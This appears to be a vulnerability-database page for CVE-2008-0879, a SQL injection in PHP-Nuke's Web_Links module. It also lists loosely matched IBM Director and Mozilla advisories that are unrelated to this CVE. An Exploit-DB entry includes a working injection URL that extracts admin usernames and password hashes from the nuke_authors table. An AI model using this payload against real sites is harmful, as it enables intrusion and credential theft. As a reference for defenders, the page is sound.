CVE-2008-0879
published 2008-02-21CVE-2008-0879: SQL injection vulnerability in modules.php in the Web_Links module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the cid parameter…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.15%
62.7th percentile
SQL injection vulnerability in modules.php in the Web_Links module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the cid parameter in a viewlink action.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IBM Director 5.20.3su2 CIM Server - Remote Denial of Service
exploitdb·2009-03-10
CVE-2009-0879 IBM Director 5.20.3su2 CIM Server - Remote Denial of Service
IBM Director 5.20.3su2 CIM Server - Remote Denial of Service
---
SEC-CONSULT Security Advisory
title: IBM Director CIM Server Remote Denial of Service Vulnerability
program: IBM Director for Windows
vulnerable version: <= 5.20.3 Service Update 2
homepage: http://www-03.ibm.com/systems/management/director/
found: Sept. 2008
by: Bernhard Mueller / SEC Consult Vulnerability Lab
permanent link:
http://www.sec-consult.com/files/20090305-1_IBM_director_DoS.txt
Product description:
IBM Director is an application that can track and view system
configurations of remote computers. It is available for Linux, AIX, and
Windows servers.
Vulnerability overview:
The CIM server contained in the IBM Director suite for Microsoft Windows
is vulnerable to a remote denial of service attack. The vulnerabi
Exploit-DB
PHP-Nuke Web_Links Module - 'cid' SQL Injection
exploitdb·2008-02-19
CVE-2008-0879 PHP-Nuke Web_Links Module - 'cid' SQL Injection
PHP-Nuke Web_Links Module - 'cid' SQL Injection
---
source: https://www.securityfocus.com/bid/27894/info
The PHP-Nuke Web_Links module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(aid,0x3a,pwd),char(111,112,101,114,110,97,108,101,51)/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201=%202
Bugzilla
CVE-2008-4063 Mozilla crashes with evidence of memory corruption
bugzilla·2008-09-22·CVSS 9.3
CVE-2008-4063 [CRITICAL] CVE-2008-4063 Mozilla crashes with evidence of memory corruption
CVE-2008-4063 Mozilla crashes with evidence of memory corruption
Mozilla developers identified and fixed several stability bugs in the
browser engine used in Firefox and other Mozilla-based products. Some of
these crashes showed evidence of memory corruption under certain
circumstances and we presume that with enough effort at least some of these
could be exploited to run arbitrary code.
Jesse Ruderman, Bob Clary, and Martijn Wargers reported crashes in the
layout engine which only affected Firefox 3.
Discussion:
This is now public
---
This was addressed via:
Red Hat Enterprise Linux version 4 (RHSA-2008:0879)
Red Hat Enterprise Linux version 5 (RHSA-2008:0879)
Bugzilla
CVE-2008-4068 Mozilla local HTML file recource: bypass
bugzilla·2008-09-22·CVSS 7.8
CVE-2008-4068 [HIGH] CVE-2008-4068 Mozilla local HTML file recource: bypass
CVE-2008-4068 Mozilla local HTML file recource: bypass
From MFSA 2008-44:
Mozilla developer Georgi Guninski reported that the restrictions imposed on
local HTML files could be bypassed using the resource: protocol. The
vulnerability allowed an attacker to read information about the system and
prompt the victim to save the information in a file.
Discussion:
This is now public
---
thunderbird-2.0.0.18-1.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.
---
thunderbird-2.0.0.18-1.fc9 has been pushed to the Fedora 9 stable repository. If problems still persist, please make note of it in this bug report.
---
This was addressed via:
Red Hat Enterprise Linux version 4 (firefox) RHSA-2008:0879
Red Hat Enterprise L
Bugzilla
CVE-2008-4067 Mozilla resource: traversal vulnerability
bugzilla·2008-09-22·CVSS 4.3
CVE-2008-4067 [MEDIUM] CVE-2008-4067 Mozilla resource: traversal vulnerability
CVE-2008-4067 Mozilla resource: traversal vulnerability
From MFSA 2008-44:
Mozilla developer Boris Zbarsky reported that the resource: protocol
allowed directory traversal on Linux when using URL-encoded slashes.
Discussion:
This is now public
---
thunderbird-2.0.0.18-1.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.
---
thunderbird-2.0.0.18-1.fc9 has been pushed to the Fedora 9 stable repository. If problems still persist, please make note of it in this bug report.
---
This was addressed via:
Red Hat Enterprise Linux version 4 (firefox) RHSA-2008:0879
Red Hat Enterprise Linux version 5 (firefox) RHSA-2008:0879
Red Hat Enterprise Linux version 2.1 (seamonkey) RHSA-2008:0882
Red Hat Enterprise Linux versi
Bugzilla
CVE-2008-3837 mozilla: Forced mouse drag
bugzilla·2008-09-22·CVSS 9.3
CVE-2008-3837 [CRITICAL] CVE-2008-3837 mozilla: Forced mouse drag
CVE-2008-3837 mozilla: Forced mouse drag
From MFSA 2008-40:
Mozilla developer Paul Nickerson reported a variant of a click-hijacking
vulnerability discovered in Internet Explorer by Liu Die Yu. The
vulnerability allowed an attacker to move the content window while the
mouse was being clicked, causing an item to be dragged rather than
clicked-on. This issue could potentially be used to force a user to
download a file or perform other drag-and-drop actions.
Discussion:
This is now public
---
This was addressed via:
Red Hat Enterprise Linux version 4 (firefox) RHSA-2008:0879
Red Hat Enterprise Linux version 5 (firefox) RHSA-2008:0879
Red Hat Enterprise Linux version 2.1 (seamonkey) RHSA-2008:0882
Red Hat Enterprise Linux version 3 (seamonkey) RHSA-2008:0882
Red Hat Enterprise Linux vers
Bugzilla
CVE-2008-4064 Mozilla crashes with evidence of memory corruption
bugzilla·2008-09-22·CVSS 10.0
CVE-2008-4064 [CRITICAL] CVE-2008-4064 Mozilla crashes with evidence of memory corruption
CVE-2008-4064 Mozilla crashes with evidence of memory corruption
From MFSA 2008-42:
Mozilla developers identified and fixed several stability bugs in the
browser engine used in Firefox and other Mozilla-based products. Some of
these crashes showed evidence of memory corruption under certain
circumstances and we presume that with enough effort at least some of these
could be exploited to run arbitrary code.
David Maciejak and Drew Yao reported crashes in graphics rendering which
only affected Firefox 3.
Discussion:
This is now public
---
This was addressed via:
Red Hat Enterprise Linux version 4 (RHSA-2008:0879)
Red Hat Enterprise Linux version 5 (RHSA-2008:0879)
http://packetstormsecurity.com/files/126697/PHP-Nuke-Web-Links-SQL-Injection.htmlhttp://securityreason.com/securityalert/3684http://www.securityfocus.com/archive/1/488356/100/0/threadedhttp://www.securityfocus.com/bid/27894http://www.securityfocus.com/bid/67463https://exchange.xforce.ibmcloud.com/vulnerabilities/40862http://packetstormsecurity.com/files/126697/PHP-Nuke-Web-Links-SQL-Injection.htmlhttp://securityreason.com/securityalert/3684http://www.securityfocus.com/archive/1/488356/100/0/threadedhttp://www.securityfocus.com/bid/27894http://www.securityfocus.com/bid/67463https://exchange.xforce.ibmcloud.com/vulnerabilities/40862
2008-02-21
Published